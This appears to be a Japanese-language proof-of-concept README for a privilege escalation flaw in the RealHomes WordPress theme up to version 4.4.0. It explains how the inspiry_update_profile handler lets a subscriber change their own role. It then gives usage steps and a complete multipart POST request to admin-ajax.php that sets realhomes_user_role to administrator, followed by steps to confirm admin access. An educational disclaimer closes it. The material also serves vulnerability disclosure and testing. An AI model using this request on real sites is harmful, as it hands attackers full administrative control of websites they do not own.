
RH - 不動産WordPressテーマ <= 4.4.0 - 認証済み(購読者以上)権限昇格
🔥 脆弱性概要
WordPressテーマRealHomesのバージョン4.4.0以下には、権限昇格の脆弱性が存在します。これにより、低い権限(購読者など)で認証されたユーザーが、管理者にロールを昇格させることが可能です。この脆弱性はinspiry_update_profile関数で発生し、ere_allow_users_change_roleオプションが有効な場合にユーザーがロールを変更することを不適切に許可します。
この問題は、admin-ajax.phpエンドポイントに対して特別に細工されたPOSTリクエストを送信し、realhomes_user_roleパラメータにadministratorを設定することで悪用できます。
🔍 影響を受けるテーマ
🧪 エクスプロイトの特徴
realhomes_user_roleパラメータを介してユーザーロールをadministratorに昇格させます。🧠 研究者
🚀 使用方法
低権限ユーザー(例:購読者)としてターゲットWebサイトにログインします。
/wp-admin/admin-ajax.phpエンドポイントに、以下のPOSTデータをアクセスします。これにはrealhomes_user_roleがadministratorに設定されています。
POST /wp-admin/admin-ajax.php HTTP/2
Host: targetsite.com
Cookie: wordpress_logged_in_xxx=...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNGw1yuikHiYVYYsr
------WebKitFormBoundaryNGw1yuikHiYVYYsr
Content-Disposition: form-data; name="first-name"
test
------WebKitFormBoundaryNGw1yuikHiYVYYsr
Content-Disposition: form-data; name="last-name"
user
------WebKitFormBoundaryNGw1yuikHiYVYYsr
Content-Disposition: form-data; name="realhomes_user_role"
administrator
------WebKitFormBoundaryNGw1yuikHiYVYYsr
Content-Disposition: form-data; name="action"
inspiry_update_profile
------WebKitFormBoundaryNGw1yuikHiYVYYsr--
レスポンスを確認します:リクエストが成功した場合、攻撃者は管理者アクセスを取得します。
/wp-admin/ページにアクセスして、攻撃者に管理者権限が付与されたことを確認します。
🔒 免責事項: これは教育目的のみを意図しており、自身が所有するシステム、または明示的にテストを許可されたシステムでのみ使用する必要があります。このコードの誤用は法的な結果を招く可能性があります。